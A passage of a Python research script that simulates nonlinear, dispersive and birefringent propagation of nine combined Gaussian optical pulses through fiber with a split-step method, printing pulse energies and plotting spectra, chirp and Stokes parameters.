spectrum\n#Spectot=Spec1+Spec2+Spec3+Spec4+Spec5+Spec6+Spec7+Spec8+Spec9\n#Spectot0=Spec1+Spec2+Spec3+Spec4+Spec5+Spec6+Spec7+Spec8+Spec9 #Copy of initial spectrum\n\nprint(\" \")\nprint(\"Generating pulses from individual spectra\")\n### Generate pulses for each spectrum ###\n#dasd,pulse1=getPulseFromSpectrum(freq,Spec1)\n#dasd,pulse2=getPulseFromSpectrum(freq,Spec2)\n#dasd,pulse3=getPulseFromSpectrum(freq,Spec3)\n#dasd,pulse4=getPulseFromSpectrum(freq,Spec4)\n#dasd,pulse5=getPulseFromSpectrum(freq,Spec5)\n#dasd,pulse6=getPulseFromSpectrum(freq,Spec6)\n#dasd,pulse7=getPulseFromSpectrum(freq,Spec7)\n#dasd,pulse8=getPulseFromSpectrum(freq,Spec8)\n#dasd,pulse9=getPulseFromSpectrum(freq,Spec9)\n\npulse1=GaussianPulse(tau,ampllist[0],tlist[0],Tlist[0],0,pol1)*np.exp(1j*((omegalist[0]-wm)*tau))\npulse2=GaussianPulse(tau,ampllist[1],tlist[1],Tlist[1],0,pol2)*np.exp(1j*((omegalist[1]-wm)*tau))\npulse3=GaussianPulse(tau,ampllist[2],tlist[2],Tlist[2],0,pol3)*np.exp(1j*(-(omegalist[2]-wm)*tau))\npulse4=GaussianPulse(tau,ampllist[3],tlist[3],Tlist[3],0,pol4)*np.exp(1j*(-(omegalist[3]-wm)*tau))\npulse5=GaussianPulse(tau,ampllist[4],tlist[4],Tlist[4],0,pol5)*np.exp(1j*(-(omegalist[4]-wm)*tau))\npulse6=GaussianPulse(tau,ampllist[5],tlist[5],Tlist[5],0,pol6)*np.exp(1j*(-(omegalist[5]-wm)*tau))\npulse7=GaussianPulse(tau,ampllist[6],tlist[6],Tlist[6],0,pol7)*np.exp(1j*(-(omegalist[6]-wm)*tau))\npulse8=GaussianPulse(tau,ampllist[7],tlist[7],Tlist[7],0,pol8)*np.exp(1j*(-(omegalist[7]-wm)*tau))\npulse9=GaussianPulse(tau,ampllist[8],tlist[8],Tlist[8],0,pol9)*np.exp(1j*(-(omegalist[8]-wm)*tau))\n\nprint(\" \")\nprint(\"Adding them up to a total pulse\")\n### Generate total pulse from total spectrum ###\n#dasd,Pulsetot=getPulseFromSpectrum(freq,Spectot)\n#dasd,Pulsetot0=getPulseFromSpectrum(freq,Spectot)\n\nPulsetot =pulse1+pulse2+pulse3+pulse4+pulse5+pulse6+pulse7+pulse8+pulse9\nPulsetot0=pulse1+pulse2+pulse3+pulse4+pulse5+pulse6+pulse7+pulse8+pulse9\n\nvv,Spectot=getSpectrumFromPulse(tau,Pulsetot)\nvv,Spectot0=getSpectrumFromPulse(tau,Pulsetot0)\n\n\n#Pulsetot=Pulsetot*np.exp(-1j*np.angle(Pulsetot))\n#Pulsetot0=Pulsetot0*np.exp(-1j*np.angle(Pulsetot0))\n\n\nE1=pulseEnergy(tau,pulse1)\nE2=pulseEnergy(tau,pulse2)\nE3=pulseEnergy(tau,pulse3)\nE4=pulseEnergy(tau,pulse4)\nE5=pulseEnergy(tau,pulse5)\nE6=pulseEnergy(tau,pulse6)\nE7=pulseEnergy(tau,pulse7)\nE8=pulseEnergy(tau,pulse8)\nE9=pulseEnergy(tau,pulse9)\n\nElist=np.array([E1,E2,E3,E4,E5,E6,E7,E8,E9])\nprint(\" \")\nprint(\"The energies of the pulses are\")\nprint(str(np.round(Elist*1e9,rounding))+'[nJ]')\n\nEtot=pulseEnergy(tau,Pulsetot0)\n\nprint(\" \")\nprint(\"The total pulse energy is Etot=\"+str(Etot*1e9)+' [nJ]')\nprint(\"Just to check, we also sum the individual energies=\"+str(np.sum(Elist)*1e9)+' [nJ]')\nprint(\" \")\n\n\n#plt.figure()\n#plt.title('Testing spectrum for individual freq. comp.')\n#plt.plot(freq/1e12,np.abs(Spec1)**2*1e12,label='E1='+str(np.round(spectralEnergy(freq,Spec1)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec2)**2*1e12,label='E2='+str(np.round(spectralEnergy(freq,Spec2)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec3)**2*1e12,label='E3='+str(np.round(spectralEnergy(freq,Spec3)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec4)**2*1e12,label='E4='+str(np.round(spectralEnergy(freq,Spec4)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec5)**2*1e12,label='E5='+str(np.round(spectralEnergy(freq,Spec5)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec6)**2*1e12,label='E6='+str(np.round(spectralEnergy(freq,Spec6)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec7)**2*1e12,label='E7='+str(np.round(spectralEnergy(freq,Spec7)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec8)**2*1e12,label='E8='+str(np.round(spectralEnergy(freq,Spec8)*1e9,rounding))+'nJ.')\n#plt.plot(freq/1e12,np.abs(Spec9)**2*1e12,label='E9='+str(np.round(spectralEnergy(freq,Spec9)*1e9,rounding))+'nJ.')\n#plt.xlabel('Frequency [THz]')\n#plt.ylabel('Power density [W/THz]')\n#plt.yscale('log')\n#plt.grid()\n#plt.axis([np.min(freq/1e12),np.max(freq/1e12),np.min(np.abs(Awlist)**2*1e12)*1e-6,np.max(np.abs(Awlist)**2*1e12)*10])\n#plt.legend(frameon=False)\n#plt.show()\n\n\nplt.figure()\nplt.title('Testing trace for individual freq component')\nplt.plot(tau*1e9,pulsePower(pulse1),label='E1='+str(np.round(pulseEnergy(tau,pulse1)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse2),label='E2='+str(np.round(pulseEnergy(tau,pulse2)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse3),label='E3='+str(np.round(pulseEnergy(tau,pulse3)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse4),label='E4='+str(np.round(pulseEnergy(tau,pulse4)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse5),label='E5='+str(np.round(pulseEnergy(tau,pulse5)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse6),label='E6='+str(np.round(pulseEnergy(tau,pulse6)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse7),label='E7='+str(np.round(pulseEnergy(tau,pulse7)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse8),label='E8='+str(np.round(pulseEnergy(tau,pulse8)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulse9),label='E9='+str(np.round(pulseEnergy(tau,pulse9)*1e9,rounding))+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\n\n\n################ Define time and frequency arrays ###############\n\n\n\n\n\nprint(\"Plot input pulse and spectrum\") ###############\n\n\nplt.figure()\nplt.title('Total input pulse')\nplt.plot(tau*1e9,pulsePower(Pulsetot),label='E='+str(Etot*1e9)+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\nplt.figure()\nplt.title('Phase of Total input pulse')\nplt.plot(tau*1e9,getPhase(Pulsetot0[0]),label='$\\phi_x$')\nplt.plot(tau*1e9,getPhase(Pulsetot0[1]),label='$\\phi_y$')\nplt.xlabel('Time [ns]')\nplt.ylabel('Phase [rad]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\ncx=getChirp(tau,Pulsetot0[0])\ncy=getChirp(tau,Pulsetot0[1])\n\n\nfig,ax=plt.subplots()\nplt.title('Chirp of Total input pulse')\nplt.plot(tau*1e9,cx/1e12,label='$c_x$')\nplt.plot(tau*1e9,cy/1e12,label='$c_y$')\nplt.xlabel('Time [ns]')\nplt.ylabel('Local Chirp [THz]')\nax.set_xlim(-2*np.max(Tlist)*1e9,2*np.max(Tlist)*1e9)\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\n\n\n\n\n\nplt.figure()\nplt.title('Zoom on total input pulse')\nplt.plot(tau*1e9,pulsePower(Pulsetot0),label='E='+str(Etot*1e9)+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.axis([-2*Tlist[0]*1e9,2*Tlist[0]*1e9,0,np.max(np.abs(Pulsetot0)**2)*2])\nplt.legend(frameon=False)\nplt.show()\n\nplt.figure()\nplt.title('Total input spectrum')\nplt.plot(fplot,spectralPower(Spectot0)*1e12,label='E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ.')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\n#plt.axis([np.min(freq/1e12),np.max(freq/1e12),np.min(np.abs(Awlist)**2*1e12)*1e-6,np.max(np.abs(Awlist)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\n\nplt.figure()\nplt.title('Zoom on total input spectrum')\nplt.plot(fplot,spectralPower(Spectot0)*1e12,label='E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ.')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\nplt.axis([omegalist[1]/2/pi/1e12,omegalist[0]/2/pi/1e12, 1e-34,1e0])\n#plt.axis([omegalist[1]/1e12/2/pi-50*ws/1e12/2/pi,omegalist[0]/1e12/2/pi+50*ws/1e12/2/pi,np.min(np.abs(Awlist)**2*1e12)*1e-6,np.max(np.abs(Awlist)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\n\na,b=getSpectrumFromPulse(tau,Pulsetot0)\nc,d=getPulseFromSpectrum(freq,b)\n\n\nplt.figure()\nplt.plot(freq/1e12,np.log10(spectralPower(b)))\n#plt.plot(freq/1e12,np.log10(spectralPower(d))-10)\nplt.axis([-0.02,0.02,-50,10])\nplt.grid()\nplt.show()\n\n############## Calculate dispersive phase shift ###############\n\nPulsetot_NL=Pulsetot0*np.exp(1j*NL_on*gamma*distance*pulsePower(Pulsetot0))\ns,Specfinal_NL=getSpectrumFromPulse(tau,Pulsetot_NL)\n\nplt.figure()\nplt.title('Expected final spectrum with only NL effect')\nplt.plot(freq/1e12,spectralPower(Spectot0)*1e12,label='E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ.')\nplt.plot(freq/1e12,spectralPower(Specfinal_NL)*1e12,'r-',label='E='+str(np.round(spectralEnergy(freq,Specfinal_NL)*1e9,4))+'nJ.')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\nplt.axis([omegalist[1]/1e12/2/pi-5*ws/1e12/2/pi,omegalist[0]/1e12/2/pi+5*ws/1e12/2/pi,np.max(np.abs(Spectot)**2*1e12)*1e-11,np.max(np.abs(Spectot)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\ndispersion=np.exp(dispersion_on*0.5*1j*f3w(wm)*(omega)**2*deltaz) \ndisptot=np.exp(dispersion_on*0.5*1j*f3w(wm)*(omega)**2*distance)\nSpecfinal_disp=Spectot0*disptot\n\nplt.figure()\nplt.title('Expected final spectrum with only disp effect')\nplt.plot(fplot,pulsePower(Spectot0)*1e12+1e-100)\nplt.plot(fplot,pulsePower(Specfinal_disp)*1e12+1e-100,'r-')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\n#plt.axis([np.min(fplot),np.max(fplot),np.max(np.abs(Spectot)**2)*1e-9,np.max(np.abs(Spectot)**2)*10])\nplt.legend(frameon=False)\nplt.show()\n\nss,Pulsefinal_disp=getPulseFromSpectrum(freq,Specfinal_disp)\n\n\n\nplt.figure()\nplt.title('Expected final pulse with only disp effect')\nplt.plot(tau*1e9,pulsePower(Pulsetot0),label='E='+str(np.round(pulseEnergy(tau,Pulsetot0)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(Pulsefinal_disp),'r-',label='E='+str(np.round(pulseEnergy(tau,Pulsefinal_disp)*1e9,rounding))+'nJ.')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power density [W]')\nplt.grid()\n#plt.axis([np.min(fplot),np.max(fplot),np.max(np.abs(Spectot)**2)*1e-9,np.max(np.abs(Spectot)**2)*10])\nplt.legend(frameon=False)\nplt.show()\n\n\n#Dispersion phase factor evaluated at mean frequency\n\n\nhhz=NL_on*1j*gamma*deltaz #NL phase factor\n\nboxfilt0=box(freq,omegalist[1]/2/pi+ws/2/pi,np.abs(omegalist[1]-omegalist[0])/10)\nboxfiltm1=box(freq,omegalist[1]/2/pi+ws/2/pi,np.abs(omegalist[1]-omegalist[0])/10)\n\n\n\n#pulsematrix=np.zeros([step_num+1,len(omega)])*1j\n#spectrummatrix=np.zeros([step_num+1,len(omega)])*1j\n#extractionmatrix=np.zeros([step_num+1,len(omega)])*1j\n#extractionmatrixm1=np.zeros([step_num+1,len(omega)])*1j\n\n#pulsematrix[0,:]=Pulsetot0\n#spectrummatrix[0,:]=Spectot0\n#extractionmatrix[0,:]=pulse2\n#extractionmatrixm1[0,:]=pulse1\n\n\ntemp=(Pulsetot0*np.exp(pulsePower(Pulsetot0)*hhz/2)) #apply initial NL phase factor\nfor n in range(1,step_num+1):\n #print(n)\n \n s,f_temp=getSpectrumFromPulse(tau,temp) #Get the spectru from the pulse and apply dispersion \n f_temp=f_temp*dispersion\n \n s,temp=getPulseFromSpectrum(freq,f_temp) #Convert back to a pulse\n #temp=sp.fftpack.fftshift(temp) #Note: Here I have to do an extra FFT shift for some reason. Not sure why, but it works!\n \n bireftheta=random.uniform(-pi,pi)*1.0*Biref_on\n birefphi=random.uniform(-pi/2,pi/2)*1.0*Biref_on\n \n \n temp=temp*np.exp(pulsePower(temp)*hhz) #Apply whole phase factor NL phase factor. \n \n Rmatrix=np.array([[np.cos(bireftheta),np.sin(bireftheta)*np.exp(1j*birefphi)],[-np.sin(bireftheta)*np.exp(-1j*birefphi),np.cos(bireftheta)]])\n \n temp=np.dot(Rmatrix,temp)\n \n #Save pulses and spectra for visualization later\n dummypulse=temp*np.exp(pulsePower(temp)*hhz/2)\n #pulsematrix[n,:]=dummypulse\n s,dummyspec=getSpectrumFromPulse(tau,dummypulse) \n #spectrummatrix[n,:]=dummyspec\n \n# dummyspecextraction=dummyspec*boxfilt0\n# dummyspecextractionm1=dummyspec*boxfiltm1\n \n# s,dummypulseextraction=getPulseFromSpectrum(freq,dummyspecextraction) \n# s,dummypulseextractionm1=getPulseFromSpectrum(freq,dummyspecextractionm1)\n# extractionmatrix[n,:]=dummypulseextraction\n# extractionmatrixm1[n,:]=dummypulseextractionm1\n \n\n #print(np.round(n/step_num*100.0,4)) \n \n #print(\"NSLE solution step number \"+str(n)+\" out of \"+str(step_num))\n if np.round(n/step_num*100.0,4)%10==0.0:\n print(\"Since np.round(n/step_num*100.0,4)%10==0.0 because n=\"+ str(n)+\"we print graphs\") \n #temp=temp*np.exp(np.abs(temp)**2*hhz/2) #Apply final NL phase factor. \n dummyspecextraction=getSideband(freq,dummyspec,(omegalist[1]/2/pi)-fm,omegalist[0]/2/pi-fm,sidebandnumber)\n dummyspecextractionm1=dummyspec*boxfiltm1\n \n s,dummypulseextraction=getPulseFromSpectrum(freq,dummyspecextraction) \n s,dummypulseextractionm1=getPulseFromSpectrum(freq,dummyspecextractionm1)\n \n print(Rmatrix)\n \n plt.figure()\n plt.title('Output pulse. z='+str(n*deltaz/1e3)+'km')\n plt.plot(tau*1e9,pulsePower(Pulsetot0), linewidth=5,label='Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n plt.plot(tau*1e9,pulsePower(Pulsefinal_disp),'r-', linewidth=5,label='Only disp')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n plt.plot(tau*1e9,pulsePower(dummypulse), linewidth=5,label='Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n plt.xlabel('Time [ns]')\n plt.ylabel('Power [W]')\n plt.grid()\n plt.legend(frameon=False)\n plt.show()\n\n\n\n\n\n\n plt.figure()\n plt.plot(tau*1e9,pulsePower(dummypulseextraction))\n plt.grid()\n plt.show()\n \n S0=pulsePower(dummypulseextraction)\n S1=(np.abs(dummypulseextraction[0])**2-np.abs(dummypulseextraction[1])**2)/S0\n S2=2*np.real(dummypulseextraction[0]*np.conj(dummypulseextraction[1]))/S0\n S3=-2*np.imag(dummypulseextraction[0]*np.conj(dummypulseextraction[1]))/S0\n \n plt.figure()\n plt.plot(tau*1e9,S0/np.max(S0),label='S0')\n plt.plot(tau*1e9,S1**2*np.sign(S1),label='S1')\n plt.plot(tau*1e9,S2**2*np.sign(S2),label='S2')\n plt.plot(tau*1e9,S3**2*np.sign(S3),label='S3')\n plt.grid()\n plt.legend()\n plt.axis([-50,50,-1.05,1.05])\n plt.show()\n \n# plt.figure()\n# plt.title('Phase of output pulse. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,getPhase(Pulsetot0[0]), linewidth=5,label='Initial phase x')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getPhase(Pulsetot0[1]), linewidth=5,label='Initial phase y')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# \n# plt.plot(tau*1e9,getPhase(dummypulse[0]), linewidth=5,label='Output phase x')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getPhase(dummypulse[1]), linewidth=5,label='Output phase y')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Phase [rad]')\n# plt.grid()\n# #plt.axis([np.min(tau)*1e9,np.max(tau)*1e9,-0.5,0.5])\n# plt.legend(frameon=False)\n# plt.show()\n \n# plt.figure()\n# plt.title('Chirp of output pulse. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,getChirp(tau,Pulsetot0[0])/1e6, linewidth=5,label='Initial chirp x')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getChirp(tau,Pulsetot0[1])/1e6, linewidth=5,label='Initial chirp y')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#\n# plt.plot(tau*1e9,getChirp(tau,dummypulse[0])/1e6, linewidth=5,label='Output chirp x')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ') \n# plt.plot(tau*1e9,getChirp(tau,dummypulse[1])/1e6, linewidth=5,label='Output chirp y')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ') \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Local Chirp [MHz]')\n# plt.grid()\n# #ax.set_xlim(-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9)\n# plt.axis([-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9,-5/2/np.min(Tlist)/1e6,5/2/np.min(Tlist)/1e6])\n# plt.legend(frameon=False)\n# plt.show()\n \n \n\n# plt.figure()\n# plt.title('Output pulse for m=0. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,pulsePower(Pulsetot0), linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,pulsePower(pulse2),'r-', linewidth=5,label='m=0 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,pulsePower(dummypulseextraction), linewidth=5,label='m=0 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.yscale('log')\n# plt.grid()\n# plt.legend(frameon=False)\n# plt.show()\n# \n# plt.figure()\n# plt.title('Chirp of m=0 pulse. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,getChirp(tau,pulse2[0])/1e9, linewidth=5,label='Initial chirp x')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getChirp(tau,pulse2[1])/1e9, linewidth=5,label='Initial chirp y')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# \n# plt.plot(tau*1e9,getChirp(tau,dummypulseextraction[0])/1e9, linewidth=5,label='Output x')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,getChirp(tau,dummypulseextraction[1])/1e9, linewidth=5,label='Output y')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Local Chirp [GHz]')\n# \n# plt.grid()\n# plt.axis([-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9,12,13])\n# \n# #plt.axis([-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9,-1/4/np.min(Tlist)/1e6,1/4/np.min(Tlist)/1e6])\n# plt.legend(frameon=False)\n# plt.show()\n \n \n# plt.figure()\n# plt.title('Output pulse for m=0. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,10*np.log10(np.abs(Pulsetot0)**2/np.max(np.abs(Pulsetot0)**2)), linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,10*np.log10((np.abs(pulse2)**2)/np.max(np.abs(pulse2)**2)),'r-', linewidth=5,label='m=0 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,10*np.log10(np.abs(dummypulseextraction)**2/np.max(np.abs(pulse2)**2)), linewidth=5,label='m=0 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power rel. to max input [dB]')\n# plt.axis([np.min(tau*1e9),np.max(tau*1e9),-50,50])\n# plt.grid()\n# plt.legend(frameon=False)\n# plt.show()\n\n\n###\n# plt.figure()\n# plt.title('Output pulse for m=-1. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,np.abs(Pulsetot0)**2, linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,np.abs(pulse1)**2,'r-', linewidth=5,label='m=-1 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,np.abs(dummypulseextractionm1)**2, linewidth=5,label='m=-1 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.yscale('log')\n# plt.grid()\n# plt.axis([np.min(tau)*1e9,np.max(tau)*1e9,1e-30,np.max(np.abs(Pulsetot0)**2)*2])\n# plt.legend(frameon=False)\n# plt.show()\n# \n# plt.figure()\n# plt.title('Output pulse for m=-1. z='+str(n*deltaz/1e3)+'km')\n# plt.plot(tau*1e9,10*np.log10(np.abs(Pulsetot0)**2/np.max(np.abs(Pulsetot0)**2)), linewidth=5,label='Total Input')#'E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.plot(tau*1e9,10*np.log10((np.abs(pulse1)**2)/np.max(np.abs(pulse1)**2)),'r-', linewidth=5,label='m=-1 Input')#'E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ. Only disp')\n# plt.plot(tau*1e9,10*np.log10(np.abs(dummypulseextractionm1)**2/np.max(np.abs(pulse1)**2)), linewidth=5,label='m=-1 Output')#'E='+str(np.round(pulseEnergy(tau,dummypulse)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power rel. to max input [dB]')\n# plt.axis([np.min(tau*1e9),np.max(tau*1e9),-50,50])\n# plt.grid()\n# plt.legend(frameon=False)\n# plt.show()\n####\n\n plt.figure()\n plt.title('Output Spectrum. z='+str(n*deltaz/1e3)+'km')\n plt.plot(fplot,spectralPower(Spectot0)*1e12, linewidth=5,label='Input')#'E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\n #plt.plot(freq/1e12,np.abs(Specfinal_NL)**2*1e12,'r-', linewidth=5,label='Only NL')#label='E='+str(np.round(spectralEnergy(freq,specfinal)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ. Only NL')\n plt.plot(fplot,spectralPower(dummyspec)*1e12, linewidth=5,label='Output')#'E='+str(np.round(spectralEnergy(freq,dummyspec)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\n plt.plot(fplot,spectralPower(dummyspecextraction)*1e12, linewidth=5,label='n='+str(sidebandnumber))#'E='+str(np.round(spectralEnergy(freq,dummyspec)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\n plt.axis([fplot[int(len(fplot)/2-len(fplot)/10)],fplot[int(len(fplot)/2+len(fplot)/10)],1e-30,1e0])\n \n plt.plot((omegalist[0]+wm)/2/pi/1e12,1e-10,'r.',markersize=25)\n plt.plot((omegalist[1]+wm)/2/pi/1e12,1e-10,'m.',markersize=25)\n \n plt.xlabel('Frequency [THz]')\n plt.ylabel('Power density [W/THz]')\n plt.yscale('log')\n plt.grid()\n #plt.axis([fm/1e12-0.0005,fm/1e12+0.0005,1e-35,1e13])\n #plt.axis([omegalist[1]/1e12/2/pi-5*ws/2/pi/1e12,omegalist[0]/1e12/2/pi+5*ws/2/pi/1e12,np.max(np.abs(Spectot0)**2*1e12)*1e-15,np.max(np.abs(Spectot0)**2*1e12)*10])\n #plt.axis([omegalist[0]/2/pi/1e12-0.0005,omegalist[0]/2/pi/1e12+0.0005,1e-40,1e8])\n #plt.axis([np.min(freq/1e12),np.max(freq/1e12),np.max(np.abs(Spectot0)**2*1e12)*1e-9,np.max(np.abs(Spectot0)**2*1e12)*10])\n plt.legend(frameon=False)\n plt.show()\n print(np.round(n/step_num*100.0,4))\n \n \n \n\n\npulsetot=temp*np.exp(pulsePower(temp)*hhz/2) #Apply final phase factor\ns,Spectot=getSpectrumFromPulse(tau,pulsetot)\n\nplt.figure()\n#plt.plot(tau*1e9,np.abs(pulsematrix[10,:])**2)\nplt.plot(tau*1e9,pulsePower(pulsetot))\n\nplt.figure()\nplt.title('Output pulse. z='+str(distance/1e3)+'km')\nplt.plot(tau*1e9,pulsePower(Pulsetot0), linewidth=5,label='Input')#label='E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\nplt.plot(tau*1e9,pulsePower(Pulsefinal_disp),'r-', linewidth=5,label='only disp')#label='E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ.')\nplt.plot(tau*1e9,pulsePower(pulsetot), linewidth=5,label='Output')#='E='+str(np.round(pulseEnergy(tau,pulsetot)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\nplt.xlabel('Time [ns]')\nplt.ylabel('Power [W]')\nplt.grid()\nplt.legend(frameon=False)\nplt.show()\n\n\n\n\n#plt.figure()\n#plt.title('Chirp of Output pulse. z='+str(distance/1e3)+'km')\n#plt.plot(tau*1e9,getChirp(tau,Pulsetot0)/1e12, linewidth=5,label='Input')#label='E='+str(np.round(pulseEnergy(tau,pulsetot0)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#plt.plot(tau*1e9,getChirp(tau,Pulsefinal_disp)/1e12,'r-', linewidth=5,label='only disp')#label='E='+str(np.round(pulseEnergy(tau,pulse_final_only_disp)*1e9,rounding))+'nJ.')\n#plt.plot(tau*1e9,getChirp(tau,pulsetot)/1e12, linewidth=5,label='Output')#='E='+str(np.round(pulseEnergy(tau,pulsetot)*1e9,rounding))+'nJ. E_th= '+str(Etot_th)+'nJ')\n#plt.xlabel('Time [ns]')\n#plt.ylabel('Chirp 